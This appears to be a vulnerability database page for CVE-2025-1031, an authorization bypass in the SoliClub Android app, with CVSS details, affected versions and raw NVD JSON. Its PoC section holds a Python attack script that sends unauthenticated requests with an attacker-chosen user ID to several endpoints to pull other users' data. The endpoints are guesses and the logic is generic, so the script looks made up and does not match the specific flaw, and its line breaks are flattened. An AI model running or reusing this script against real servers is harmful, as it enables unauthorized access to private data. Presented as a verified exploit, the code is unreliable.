Security Vulnerability Report
中文
CVE-2025-1031 CVSS 7.5 HIGH

CVE-2025-1031

Published: 2025-12-18 15:15:54
Last Modified: 2026-01-16 14:50:32

Description

Authorization Bypass Through User-Controlled Key vulnerability in Utarit Informatics Services Inc. SoliClub allows Functionality Misuse.This issue affects SoliClub: from 5.2.4 before 5.3.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:* - VULNERABLE
SoliClub >= 5.2.4 and < 5.3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-1031 PoC - Authorization Bypass in SoliClub # Target: SoliClub versions < 5.3.7 def exploit_soliclub(target_url, target_user_id): """ Exploit for CVE-2025-1031: Authorization Bypass Through User-Controlled Key This PoC demonstrates how an attacker can bypass authorization by manipulating user-controlled keys. """ # Step 1: Identify the vulnerable endpoint # The vulnerability exists in endpoints that trust user-supplied identifiers # Normal request structure (authenticated user accessing own data) normal_headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'application/json' } # Vulnerable parameter manipulation # Attacker can modify the user_id or session_key parameter to access other users' data exploit_payload = { 'user_id': target_user_id, # Attacker-controlled user identifier 'session_key': 'attacker-controlled-session', 'action': 'access_sensitive_data' } # Target endpoints that may be vulnerable vulnerable_endpoints = [ f'{target_url}/api/user/profile', f'{target_url}/api/user/settings', f'{target_url}/api/club/members', f'{target_url}/api/club/data' ] print(f'[*] Testing CVE-2025-1031 on {target_url}') print(f'[*] Target user ID: {target_user_id}') for endpoint in vulnerable_endpoints: try: # Send exploit request without authentication response = requests.post( endpoint, json=exploit_payload, headers=normal_headers, timeout=10, verify=False ) if response.status_code == 200: print(f'[+] VULNERABLE: {endpoint}') print(f' Status: {response.status_code}') print(f' Response: {response.text[:200]}...') else: print(f'[-] Protected: {endpoint} (Status: {response.status_code})') except requests.RequestException as e: print(f'[!] Error testing {endpoint}: {e}') if __name__ == '__main__': if len(sys.argv) < 3: print(f'Usage: python {sys.argv[0]} <target_url> <target_user_id>') print(f'Example: python {sys.argv[0]} https://soliclub.example.com 12345') sys.exit(1) target_url = sys.argv[1] target_user_id = sys.argv[2] exploit_soliclub(target_url, target_user_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-1031", "sourceIdentifier": "[email protected]", "published": "2025-12-18T15:15:53.673", "lastModified": "2026-01-16T14:50:31.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Utarit Informatics Services Inc. SoliClub allows Functionality Misuse.This issue affects SoliClub: from 5.2.4 before 5.3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:*", "versionStartIncluding": "5.2.4", "versionEndExcluding": "5.3.7", "matchCriteriaId": "6BFA30F5-78F8-44B1-81DD-FB9264F9A1C6"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0466", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}